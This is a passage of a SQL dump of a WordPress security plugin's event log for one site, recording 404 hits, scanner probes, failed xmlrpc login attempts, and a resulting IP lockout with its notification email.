12:38:22',72662080,72761376,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'147.78.141.192'),(96819,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631104706.67121410369873046875;s:12:\"REQUEST_TIME\";i:1631104706;}}','notice','2021-09-08 12:38:28','2021-09-08 12:38:26',72645120,72744520,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'147.78.141.192'),(96820,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631104709.9823119640350341796875;s:12:\"REQUEST_TIME\";i:1631104709;}}','notice','2021-09-08 12:38:31','2021-09-08 12:38:30',72645120,72744520,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'147.78.141.192'),(96821,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631104713.1818408966064453125;s:12:\"REQUEST_TIME\";i:1631104713;}}','notice','2021-09-08 12:38:35','2021-09-08 12:38:33',72645120,72744520,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'147.78.141.192'),(96822,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; charset=UTF-8\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:17:\"mail.zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:64:\"Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)\";s:21:\"HTTP_X_REQUESTED_WITH\";s:14:\"XMLHttpRequest\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631105707.9906489849090576171875;s:12:\"REQUEST_TIME\";i:1631105707;}}','notice','2021-09-08 12:55:10','2021-09-08 12:55:08',72745832,72845784,'http://mail.zphiblgz.org/wordpress/wp-admin/setup-config.php?step=1',1,0,'49.12.201.221'),(96823,0,'brute_force','invalid-login::username-zphiblgz','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:20:\"icwp-wpsf-1961144462\";a:1:{i:0;s:57:\"Please check that box to say you\'re human, and not a bot.\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}s:8:\"username\";s:8:\"zphiblgz\";s:7:\"user_id\";i:0;s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:3:\"186\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:38:\"/home2/zphiblgz/public_html/xmlrpc.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631108486.322917938232421875;s:12:\"REQUEST_TIME\";i:1631108486;}}','notice','2021-09-08 13:41:28','2021-09-08 13:41:26',73373536,74004600,'https://zphiblgz.org/xmlrpc.php',1,0,'92.251.12.244'),(96824,0,'brute_force','invalid-login::username-zphiblgz','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:20:\"icwp-wpsf-1671950001\";a:1:{i:0;s:57:\"Please check that box to say you\'re human, and not a bot.\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}s:8:\"username\";s:8:\"zphiblgz\";s:7:\"user_id\";i:0;s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:3:\"193\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:38:\"/home2/zphiblgz/public_html/xmlrpc.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631108546.875300884246826171875;s:12:\"REQUEST_TIME\";i:1631108546;}}','notice','2021-09-08 13:42:28','2021-09-08 13:42:27',73373576,74004632,'https://zphiblgz.org/xmlrpc.php',1,0,'92.251.12.244'),(96825,0,'brute_force','invalid-login::username-zphiblgz','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:18:\"icwp-wpsf-21798770\";a:1:{i:0;s:57:\"Please check that box to say you\'re human, and not a bot.\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}s:8:\"username\";s:8:\"zphiblgz\";s:7:\"user_id\";i:0;s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:3:\"186\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:38:\"/home2/zphiblgz/public_html/xmlrpc.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631108608.06820201873779296875;s:12:\"REQUEST_TIME\";i:1631108608;}}','notice','2021-09-08 13:43:30','2021-09-08 13:43:28',73373536,74004600,'https://zphiblgz.org/xmlrpc.php',1,0,'92.251.12.244'),(96826,0,'brute_force','invalid-login::username-zphiblgz','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:19:\"icwp-wpsf-801396783\";a:1:{i:0;s:57:\"Please check that box to say you\'re human, and not a bot.\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}s:8:\"username\";s:8:\"zphiblgz\";s:7:\"user_id\";i:0;s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:3:\"187\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:38:\"/home2/zphiblgz/public_html/xmlrpc.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631108669.5333330631256103515625;s:12:\"REQUEST_TIME\";i:1631108669;}}','notice','2021-09-08 13:44:31','2021-09-08 13:44:29',73373536,74004600,'https://zphiblgz.org/xmlrpc.php',1,0,'92.251.12.244'),(96827,0,'brute_force','invalid-login::username-zphiblgz','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:20:\"icwp-wpsf-1016204289\";a:1:{i:0;s:57:\"Please check that box to say you\'re human, and not a bot.\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}s:8:\"username\";s:8:\"zphiblgz\";s:7:\"user_id\";i:0;s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:3:\"188\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:38:\"/home2/zphiblgz/public_html/xmlrpc.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631108730.586307048797607421875;s:12:\"REQUEST_TIME\";i:1631108730;}}','notice','2021-09-08 13:45:32','2021-09-08 13:45:30',73373536,74004600,'https://zphiblgz.org/xmlrpc.php',1,0,'92.251.12.244'),(96828,0,'lockout','host-lockout::92.251.12.244','a:14:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"92.251.12.244\";s:7:\"user_id\";b:0;s:8:\"username\";b:0;s:14:\"module_details\";a:6:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:5:\"label\";s:11:\"Brute Force\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2021-09-08 08:45:30\";s:17:\"lockout_start_gmt\";s:19:\"2021-09-08 13:45:30\";s:15:\"lockout_context\";s:423:\"O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:13:\"92.251.12.244\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";s:8:\"zphiblgz\";s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}\";s:14:\"lockout_expire\";s:19:\"2021-09-08 09:00:30\";s:18:\"lockout_expire_gmt\";s:19:\"2021-09-08 14:00:30\";s:12:\"lockout_host\";s:13:\"92.251.12.244\";}','action','2021-09-08 13:45:32','2021-09-08 13:45:30',73406728,74004600,'https://zphiblgz.org/xmlrpc.php',1,0,'92.251.12.244'),(96829,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:15:\"pr@zphiblgz.org\";}s:7:\"subject\";s:40:\"[zphiblgz.org] Site Lockout Notification\";}','debug','2021-09-08 13:45:32','2021-09-08 13:45:30',73925376,74004600,'https://zphiblgz.org/xmlrpc.php',1,0,'92.251.12.244'),(96830,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:52:\"text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631109434.620460033416748046875;s:12:\"REQUEST_TIME\";i:1631109434;}}','notice','2021-09-08 13:57:15','2021-09-08 13:57:14',72318848,72406112,'https://zphiblgz.org/event/youth-open-house/',1,0,'69.160.160.57'),(96831,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:52:\"text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631109446.7516300678253173828125;s:12:\"REQUEST_TIME\";i:1631109446;}}','notice','2021-09-08 13:57:28','2021-09-08 13:57:27',72599440,72683208,'http://zphiblgz.org/application',1,0,'69.160.160.57'),(96832,0,'brute_force','invalid-login::username-zphiblgz','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:20:\"icwp-wpsf-1970468965\";a:1:{i:0;s:57:\"Please check that box to say you\'re human, and not a bot.\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}s:8:\"username\";s:8:\"zphiblgz\";s:7:\"user_id\";i:0;s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:3:\"191\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:38:\"/home2/zphiblgz/public_html/xmlrpc.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631109644.77921390533447265625;s:12:\"REQUEST_TIME\";i:1631109644;}}','notice','2021-09-08 14:00:46','2021-09-08 14:00:45',73373536,74004600,'https://zphiblgz.org/xmlrpc.php',1,0,'92.251.12.244'),(96833,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:27:\"https://zphiblgz.org/youth/\";s:15:\"HTTP_USER_AGENT\";s:142:\"Mozilla/5.0 (iPhone; CPU iPhone OS 14_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/175.0.393249130 Mobile/15E148 Safari/604.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631109882.4039499759674072265625;s:12:\"REQUEST_TIME\";i:1631109882;}}','notice','2021-09-08 14:04:44','2021-09-08 14:04:42',72639200,72726568,'https://zphiblgz.org/event/youth-open-house/',1,0,'174.208.235.199'),(96834,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:45:\"https://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:130:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.39\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631117771.5805718898773193359375;s:12:\"REQUEST_TIME\";i:1631117771;}}','notice','2021-09-08 16:16:14','2021-09-08 16:16:11',72752120,72836488,'https://zphiblgz.org/scholarship/application/',1,0,'185.31.175.220'),(96835,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:103:\"Mozilla/5.0 (Windows NT 6.3; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631119032.1183130741119384765625;s:12:\"REQUEST_TIME\";i:1631119032;}}','notice','2021-09-08 16:37:14','2021-09-08 16:37:12',72599688,72683424,'http://zphiblgz.org/scholarship/application/',1,0,'1.169.89.210'),(96836,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4093.3 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631120159.331286907196044921875;s:12:\"REQUEST_TIME\";i:1631120159;}}','notice','2021-09-08 16:56:01','2021-09-08 16:55:59',72599720,72683456,'http://zphiblgz.org/scholarship/application/',1,0,'1.169.89.210'),(96837,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631120321.2740991115570068359375;s:12:\"REQUEST_TIME\";i:1631120321;}}','notice','2021-09-08 16:58:43','2021-09-08 16:58:41',72618560,72703712,'http://zphiblgz.org/wordpress',1,0,'34.71.21.196'),(96838,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631120328.1576099395751953125;s:12:\"REQUEST_TIME\";i:1631120328;}}','notice','2021-09-08 16:58:50','2021-09-08 16:58:48',72618432,72703568,'http://zphiblgz.org/wp',1,0,'34.71.21.196'),(96839,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631120330.4478199481964111328125;s:12:\"REQUEST_TIME\";i:1631120330;}}','notice','2021-09-08 16:58:52','2021-09-08 16:58:50',72618432,72703568,'http://zphiblgz.org/bc',1,0,'34.71.21.196'),(96840,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 